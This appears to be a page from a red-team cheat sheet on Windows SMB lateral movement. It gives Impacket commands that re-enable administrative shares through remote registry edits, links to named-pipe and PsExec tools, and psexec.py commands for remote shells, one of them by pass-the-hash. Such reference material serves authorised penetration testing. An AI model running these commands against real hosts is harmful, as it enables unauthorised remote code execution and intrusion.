# SMB

Enable `C$` / `ADMIN$` shares remotely with Impacket:

```
$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareServer' -vt REG_DWORD -vd 1
$ reg.py Administrator:'Passw0rd!'@192.168.1.11 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters' -v 'AutoShareWks' -vt REG_DWORD -vd 1
$ services.py Administrator:'Passw0rd!'@192.168.1.11 stop -name lanmanserver
$ services.py Administrator:'Passw0rd!'@192.168.1.11 start -name lanmanserver
```

## Named Pipes

* <https://github.com/malcomvetter/CSExec>
* <https://v1k1ngfr.github.io/fuegoshell/>
* <https://github.com/v1k1ngfr/fuegoshell/>
* <https://github.com/trustedsec/The_Shelf/tree/main/POC/impacketremoteshell>
* <https://sensepost.com/blog/2025/pipetap-a-windows-named-pipe-proxy-tool/>
* <https://github.com/sensepost/pipetap>

### PsExec

* [https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec](https://web.archive.org/web/20220517171437/https://www.contextis.com/us/blog/lateral-movement-a-deep-look-into-psexec)
* <https://blog.openthreatresearch.com/ntobjectmanager_rpc_smb_scm>
* <https://sensepost.com/blog/2025/psexecing-the-right-way-and-why-zero-trust-is-mandatory/>
* <https://github.com/sensepost/susinternals/blob/main/psexecsvc.py>
* <https://github.com/MaorSabag/impacket-jump>

#### psexec.py

```
$ psexec.py snovvcrash:'Passw0rd!'@192.168.11.1
$ rlwrap -cAr psexec.py -hashes :fc525c9683e8fe067095ba2ddc971889 megacorp.local/snovvcrash@192.168.11.1 powershell
```